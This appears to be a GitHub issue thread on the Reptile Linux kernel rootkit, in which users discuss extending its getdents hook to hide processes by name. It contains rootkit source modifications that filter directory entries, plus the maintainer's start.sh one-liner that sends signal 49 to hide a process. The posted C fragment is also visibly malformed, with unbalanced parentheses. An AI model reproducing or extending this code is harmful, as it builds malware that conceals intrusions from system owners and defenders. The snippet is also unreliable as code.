### ISSUE TITLE
Predefined Hidden process name

### ISSUE THREAD

**Issue by mrunc** [f0rb1dd3n/Reptile#7]
Hi,

I'm trying to add a hardcoded predefined hidden process name

I'm trying this but It doesn't work

    #include <linux/string.h>
    static const char* phpn = "process";

in both getdents getdents64:

	while(off < ret) {
		dir = (void *)kdir + off;
		if((!p && (memcmp(HIDE, dir->d_name, strlen(HIDE)) == 0)) 
                || (p && is_invisible(simple_strtoul(dir->d_name, NULL, 10)))) 

                /* Predefined process check  */
                || (p && (strncmp(dir->d_name, phpn, strlen(phpn)) == 0))

                {
			if(dir == kdir) {
				ret -= dir->d_reclen;
				memmove(dir, (void *)dir + dir->d_reclen, ret);
				continue;
			}
			prev->d_reclen += dir->d_reclen;
		} else {
			prev = dir;
		}
		off += dir->d_reclen;
	}
	if(copy_to_user(dirent, kdir, ret))

	kfree(kdir);
	return ret;
    }

I was going to add a signal switch next to enable and disable the hiding of predefined process(es)

**Comment by f0rb1dd3n** [comment]
Hi,

why not add the predefined proc to `start.sh` script? Is just add a line like this:
```
kill -49 `ps -ef | grep predefinedproc | grep -v grep | awk '{print $2}'`
```

I hope this helps you. And sorry my delay.
;)

**Comment by mrunc** [comment]
I realized that dir->d_name in process is the pid digit not process name so I added a "task->comm" condition in is_invisible() function
